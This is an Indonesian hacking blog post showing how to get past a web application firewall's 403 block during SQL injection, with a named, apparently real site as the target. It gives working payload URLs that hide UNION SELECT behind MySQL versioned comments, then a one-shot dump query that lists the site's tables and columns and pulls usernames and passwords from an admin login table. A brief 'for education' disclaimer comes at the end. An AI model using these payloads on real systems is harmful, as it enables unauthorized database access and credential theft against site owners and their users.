Welcome Back to my blog terkeren terkece terupdate terpopuler brow, kali ini saya akan sedikit berbagi tentang Cara atau Metode Bypass SQL Injection 403 Forbidden, buat kalian yang suka bermain sql injection chall atau mendapatkan target yang vuln sql injection pasti sering mendapatkan website yang forbidden saat ingin mengekploitasinya.

tenang jangan khawatir blog ini punya solusinya untuk anda para peretas, tapi sebelumnya yang belum baca artikel sebelumnya kami sarankan untuk membaca artikel sebelumnya karna masih banyak berita-berita dan tutorial tutorial hacking, SEO.

Baca Juga

  • Cara Patch Bug SQL-INJECTION
  • Deface Method Restricted Area Shell Upload
  • How to play music with termux
  • Cara Mencari Admin Login Dengan Dirbuster
  • Exploit CMS Magento 2.3.0 Vulnerability SQL Injection
Sebelumnya blog ini sudah membahas cara patching bug sql injection dan sekarang blog ini akan membuat artikel cara bypass sql injection 403 forbidden. 

Kerentanan ini sangatlah parah untuk suatu website karena kita bisa mengambil isi yang ada dalam website tersebut seperti list email, username, password, dll data-data penting yang ada dalam database tersebut.

tapi kali ini pembahasan nya bukan itu, pembahasan kali ini memanfaatkan celah bug tersebut, dari pada lama-lama mending langsung aja let's go!!

https://tisplanet.com/service-item.php?id=3
Di penjelasan kali ini saya tidak akan menejelaskan sedetail mungkin.
Karena ditutorial ini mungkin kalian sudah pada paham basic sqli, jadi langsung ke inti permasalahannya saja ya.

Oke baiklah kita lanjutkan, saya asumsikan udah ke tahap union+select
Gue disini setelah melakukan order+by untuk mendapatkan jumlah column dan ketika mau masukan query union+select ternyata malah kena security waf 403 Forbidden.


Untuk cara bypassnya cukup kita menambahkan beberapa karakter mysql-comments. Di target saya disini yang kena waf di union+select jadi kita tinggal menambahkan beberapa karakter mysql-comments,

Contoh,
union+select
Kita tambahkan mysql-commentsnya jadi,

/*!union*/+/*!select*/
/*!12345union*/+/*!12345select*/

Nahh jadi contohnya seperti ini,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8--+

Lihat digambar dibawah ini, bypassed.

Terus kalo udah tau angka magicknya yang keluar, selanjutnya tinggal masukan diosnya. Gue pilih angka 4 untuk dikasih dios berikut perintah lengkapnya,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8--+

Kena 403 Forbidden lagi anjirr mari kita bypass.

Oke berarti yang harus dibypass adalah diosnya, karena tadi pas mau dikasih dios malah kena waf 403 forbidden.

Untuk bypass diosnya sama seperti waktu bypass union+select tinggal menambahkan karakter mysql-comments. Lebih jelasnya seperti ini,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),5,6,7,8--+

Bypass sukses, lihat gambar diatas gan.


Selanjutnya tinggal ngedump username beserta passwordnya seperti ini,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345admin_login*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@),5,6,7,8--+ 

booms username & password nya keluarkan, hehe, etapi jadikan ini semua sebagai edukasi dan jangan lupa untuk share ke teman-teman kalian agar semua tau, ingat UU ITE ada disekeliling kita jadi tetap SMART USER oke. Semoga bermanfaat terima kasih.

Post a Comment

Jangan Lupa Untuk Terus Visit blog kami : https://mrwho-404.blogspot.com/?m=1

Previous Post Next Post